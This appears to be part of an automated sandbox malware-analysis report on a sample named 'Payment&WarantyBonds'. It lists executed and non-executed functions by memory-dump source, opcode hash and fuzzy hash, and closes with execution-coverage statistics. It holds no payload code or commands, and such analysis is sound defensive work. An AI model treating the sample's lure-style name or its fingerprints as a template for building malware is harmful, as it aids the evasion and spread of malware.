                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0284AFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: cdf1938e8785e7f5f959135d39330559e097e81b50be9fa725f22c57d9053d08
                                                                                                                                                                                • Instruction ID: de55f7ecf385cbecef9d4cd2f84dab0468363baf01bd769101ad7c07338ad737
                                                                                                                                                                                • Opcode Fuzzy Hash: cdf1938e8785e7f5f959135d39330559e097e81b50be9fa725f22c57d9053d08
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D1113BAD00249CFDB14CF9AC444BDEFBF4AF48314F10851AD858A7610C779A545CFA1
                                                                                                                                                                                Function 0114D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 00de86c089af272466bd5029d88be9d225b17581411ea0eb6e0d3645a0d46beb
                                                                                                                                                                                • Instruction ID: 57ff82202498ac8c5a54e9dbedd0d0d10c76b28a179fea4676b165afa316ca73
                                                                                                                                                                                • Opcode Fuzzy Hash: 00de86c089af272466bd5029d88be9d225b17581411ea0eb6e0d3645a0d46beb
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D216AB1500200DFDF09DF58E9C0B56BF65FBA4724F28C16DE9090B656C33AE456C7A2
                                                                                                                                                                                Function 0114D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f59a9560e0af7b73314202e5494a50c9fc2406e97b8b5903a420a91ed2a04d83
                                                                                                                                                                                • Instruction ID: 827d9ad21e280306cb91e87cb092bda794f8daff2c7358a7a4eb698ab0b4a9c2
                                                                                                                                                                                • Opcode Fuzzy Hash: f59a9560e0af7b73314202e5494a50c9fc2406e97b8b5903a420a91ed2a04d83
                                                                                                                                                                                • Instruction Fuzzy Hash: 61213371600200DFCF09DF58E9C0B2ABF75FBA8B18F24C169E9094F256C736D456CAA2
                                                                                                                                                                                Function 0115D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746418593.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_115d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cff829b8cdeaa92d04e344ff492ec3ec475796ed22f0e14f3f56445cdb8b48d8
                                                                                                                                                                                • Instruction ID: 52bdffd60464efdde826431e2d8077aa6fa284214f383571cbd8092e9be3443f
                                                                                                                                                                                • Opcode Fuzzy Hash: cff829b8cdeaa92d04e344ff492ec3ec475796ed22f0e14f3f56445cdb8b48d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 59210471504200EFDF49DF98E9C0B26BBA5FB84324F20C66DED194B256C376D446CB62
                                                                                                                                                                                Function 0115D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746418593.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_115d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 505de431272a36187a78d24fd31965feb2a61b53acb14cde57d9fece1a89d517
                                                                                                                                                                                • Instruction ID: 0ca26d972eb2d144205497a0a16237a276af968bff88923c5461d2580d4da97e
                                                                                                                                                                                • Opcode Fuzzy Hash: 505de431272a36187a78d24fd31965feb2a61b53acb14cde57d9fece1a89d517
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A210071604200DFDF59DF58E984B26BBA5EB84314F20C569DC1A4B256C33AD447CB62
                                                                                                                                                                                Function 0115D006 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746418593.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_115d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0e91314b61729c8a0a0c8eb6a7b8104cfc0365ab1914c10d3a210cefc564cf99
                                                                                                                                                                                • Instruction ID: 65d345617e31e53110885c5ee90548edef592110f37fb0e25f585bab47b280f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e91314b61729c8a0a0c8eb6a7b8104cfc0365ab1914c10d3a210cefc564cf99
                                                                                                                                                                                • Instruction Fuzzy Hash: 0321AC75509380CFDB07CF24D994B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                                                                                                                                                Function 0114D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: b160a758ce4da79bbab485070fd574a85560b11df5ad06e236f037242c030c28
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: 1911DF76404240CFDF06CF54D5C4B56BF71FB94324F28C2A9D9090B656C33AE45ACBA2
                                                                                                                                                                                Function 0114D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746357900.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_114d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: 860881ea4bc143e7a6725e948995106c3a6242169a98309e611ca338fb9b9d51
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: D111CD72504280CFCF06CF54E5C4B16BF71FB94618F24C6A9D8090F256C336D45ACBA2
                                                                                                                                                                                Function 0115D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746418593.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_115d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: 702cc558e69e02af9da6f04b2ceb9aae354e6a98d068ee428a776ff7d62bf953
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3811BB75504280DFDB06CF54D5C4B15BFA1FB84224F24C6AEDC494B296C33AD44ACB62

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 0B152BE8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1162c5c3aa1ed00c4f68e9ddc1226f900007edeafcf3f69ba1cde0e2579758df
                                                                                                                                                                                • Instruction ID: f58a794a08127f3ea9d5e3cfbc1c76e5c3e26f01c0b6cf5123dfd185e3294852
                                                                                                                                                                                • Opcode Fuzzy Hash: 1162c5c3aa1ed00c4f68e9ddc1226f900007edeafcf3f69ba1cde0e2579758df
                                                                                                                                                                                • Instruction Fuzzy Hash: 14E1F775E042198FCB14DFA9C5809AEFBF2FF89305F248169E814AB356D731A941CFA0
                                                                                                                                                                                Function 0B150838 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 27ed87e47ea79153cb096a7022a1e09bbffd828be073f5cb087dd52ef1f27c6a
                                                                                                                                                                                • Instruction ID: e44219bb78498d08bcac69b5a5e061a287c40b26d45bc5170115984c89315970
                                                                                                                                                                                • Opcode Fuzzy Hash: 27ed87e47ea79153cb096a7022a1e09bbffd828be073f5cb087dd52ef1f27c6a
                                                                                                                                                                                • Instruction Fuzzy Hash: E8E1E874E04219CFCB14DFA9C5849AEFBF2BF89305F248169E814AB35AD731A941CF60
                                                                                                                                                                                Function 0B1510A8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8de9ea8e347fdb6284ecb60bd8c60358b6254c70a60985d9d91fb2d5d20b5237
                                                                                                                                                                                • Instruction ID: f3a069082109ebd3f52ef77351468cd5c41a787a6c5ffa97bda11d86628fcef5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8de9ea8e347fdb6284ecb60bd8c60358b6254c70a60985d9d91fb2d5d20b5237
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EE1E774E04219DFCB15DFA9C590AAEFBF2BF89305F248169E814AB356D730A941CF60
                                                                                                                                                                                Function 0B1527B0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b42bd3ae425209241abceaf92ac22dcfda39e5d65e16ed3f130972264e15b85c
                                                                                                                                                                                • Instruction ID: c9f73d809be42192cd63405336dfe8f2d27291aa5b567803bc0d645f80f87d28
                                                                                                                                                                                • Opcode Fuzzy Hash: b42bd3ae425209241abceaf92ac22dcfda39e5d65e16ed3f130972264e15b85c
                                                                                                                                                                                • Instruction Fuzzy Hash: 59E1E975E04119CFCB14DFA9C5809AEFBF2BF89305F248169D814AB35AD731A941CFA0
                                                                                                                                                                                Function 0B150C70 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fe513456192b828fa9163425e474af235e4357925e701e5401b12d207066b4bd
                                                                                                                                                                                • Instruction ID: 21f3220a25b3318bb3dcf459d69dff760330be6463f5fbc5fff37bf21954a0f4
                                                                                                                                                                                • Opcode Fuzzy Hash: fe513456192b828fa9163425e474af235e4357925e701e5401b12d207066b4bd
                                                                                                                                                                                • Instruction Fuzzy Hash: A3E1E774E04119DFCB14DFA9C9849AEFBF2BF89305F248169E814AB356D731A942CF60
                                                                                                                                                                                Function 07305720 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f0a1add83b83ac9a2030dbeee7b04be5a70bfee4572bfd3cb334ef27467480f
                                                                                                                                                                                • Instruction ID: 1313a36271948cbcd7e3bca64d79cf9a672b0c6785b442b38ea2ad08c7f45153
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f0a1add83b83ac9a2030dbeee7b04be5a70bfee4572bfd3cb334ef27467480f
                                                                                                                                                                                • Instruction Fuzzy Hash: DDE11CB4E102198FDB14DFA9C5949AEFBB2FF89304F248169E419AB355D730AD41CFA0
                                                                                                                                                                                Function 07306490 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 09192deecccfba61c99f13e9d4613421058455dae3d1bb10af3322385fe795b3
                                                                                                                                                                                • Instruction ID: ffefb7d5df11958679fb83c1083db04166673ae1a88a37e7106782683fe009c8
                                                                                                                                                                                • Opcode Fuzzy Hash: 09192deecccfba61c99f13e9d4613421058455dae3d1bb10af3322385fe795b3
                                                                                                                                                                                • Instruction Fuzzy Hash: E8E12BB4E10119CFDB14DFA9C5949AEFBB2FF89304F248169E419AB359D730A941CFA0
                                                                                                                                                                                Function 073052E8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 370d8e8f80f228ffd7f4eb097c4dbe3d480d7e1b1489fd6a7f5c7eabd83b00fe
                                                                                                                                                                                • Instruction ID: 4a301428b5fe33be2be6e98a81b16fa9b53f8d3477f879640a01200cc84fbde6
                                                                                                                                                                                • Opcode Fuzzy Hash: 370d8e8f80f228ffd7f4eb097c4dbe3d480d7e1b1489fd6a7f5c7eabd83b00fe
                                                                                                                                                                                • Instruction Fuzzy Hash: FBE12AB4E141198FDB14DFA9C5949AEFBF2FF89304F248169E409AB356D730A941CFA0
                                                                                                                                                                                Function 07305BE0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2e9329f3068240459b2b39b2411a7e1bb627291003cbe602ec8af8bacc48867d
                                                                                                                                                                                • Instruction ID: f8ea1d34ee9643e614302bd3178a612a8721b21bdfdce52e0abc2b8b58d73c7b
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e9329f3068240459b2b39b2411a7e1bb627291003cbe602ec8af8bacc48867d
                                                                                                                                                                                • Instruction Fuzzy Hash: 59E12BB4E101198FDB14DFA9C5949AEFBB2FF89304F248169E419AB356D730AD41CFA0
                                                                                                                                                                                Function 07308E39 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ec0c002c9a5081ea2f082b739bad5a7de68c6f4a71cb0e992f8b6def0c337c5a
                                                                                                                                                                                • Instruction ID: 41ccb1e06f0b0350acaf4239c340c78796464151541f7751e502564fe7000148
                                                                                                                                                                                • Opcode Fuzzy Hash: ec0c002c9a5081ea2f082b739bad5a7de68c6f4a71cb0e992f8b6def0c337c5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 01D1E835D2075A8ECB15EBA4D9506DDB7B1FF95300F60879AE0093B225EB706AC5CF41
                                                                                                                                                                                Function 07308E48 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 33afe3bf93e8e8a38adf6d5fda3408ab517764e6fe7e1aba74de6f8eb9f930de
                                                                                                                                                                                • Instruction ID: a1720fb33a6753402888e62ceb51052969277a8e16e05c8b584ac2e0c7a7942d
                                                                                                                                                                                • Opcode Fuzzy Hash: 33afe3bf93e8e8a38adf6d5fda3408ab517764e6fe7e1aba74de6f8eb9f930de
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BD1E831D2075A8ECB15EBA4D950ADDB7B1FF95300F608B9AE4093B225EB706AC5CF41
                                                                                                                                                                                Function 0284EF04 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fc8348a9644d50bd5e6b5f5277b43e5c5ddf663c2ee2d50fd205059d06384f71
                                                                                                                                                                                • Instruction ID: 5e8e980c5289c7b3049d907bb8caa59665aea090dd973a5067b0e0103c1f49e2
                                                                                                                                                                                • Opcode Fuzzy Hash: fc8348a9644d50bd5e6b5f5277b43e5c5ddf663c2ee2d50fd205059d06384f71
                                                                                                                                                                                • Instruction Fuzzy Hash: 48A15D3AE002198FCF05DFA5C84099EB7B2FF89304B1545AAE905EB265DF35E956CB40
                                                                                                                                                                                Function 07309FF0 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5929d736a47f85122c7c49424e6745b94ee7fcb204c436ab75f3ca3531e2d7cd
                                                                                                                                                                                • Instruction ID: 7ba161811e5bdf4c98d773d4a066d43b417770eebeb54aab56788ad85fa6e36d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5929d736a47f85122c7c49424e6745b94ee7fcb204c436ab75f3ca3531e2d7cd
                                                                                                                                                                                • Instruction Fuzzy Hash: A37171B5E012198FDB08DFAAD5849DEFBF2BF88300F14D166E419AB255DB349942CF90
                                                                                                                                                                                Function 0B1527A2 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 11d36cf84b6199356455620e2a9e0744cf20831a12bbbcbc43cb57a9d6c2ff39
                                                                                                                                                                                • Instruction ID: ac3aeb3b39619c9ad903921d2a9e33e34c9d57fffda489058b4adc29a75b0bdf
                                                                                                                                                                                • Opcode Fuzzy Hash: 11d36cf84b6199356455620e2a9e0744cf20831a12bbbcbc43cb57a9d6c2ff39
                                                                                                                                                                                • Instruction Fuzzy Hash: 5151FD75E042198FDB14CFA9C9905AEFBF2BF89304F24C169D418AB356D731A942CFA1
                                                                                                                                                                                Function 07309FE2 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 589c82d6403ee4d4d1504d3803fa253dab33b3de32d7971b2b4da14d6724a0e8
                                                                                                                                                                                • Instruction ID: 7b97d75845dcbb55c460a463fd9f1ce7ba678cc6f4910d739a994a9a1e3c0a2b
                                                                                                                                                                                • Opcode Fuzzy Hash: 589c82d6403ee4d4d1504d3803fa253dab33b3de32d7971b2b4da14d6724a0e8
                                                                                                                                                                                • Instruction Fuzzy Hash: A15152B5E006198FDB48DFAAD98469EFBF2BF88300F14C16AD419AB354DB349946CF50

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                                Signature Coverage:3.1%
                                                                                                                                                                                Total number of Nodes:127
                                                                                                                                                                                Total number of Limit Nodes:8
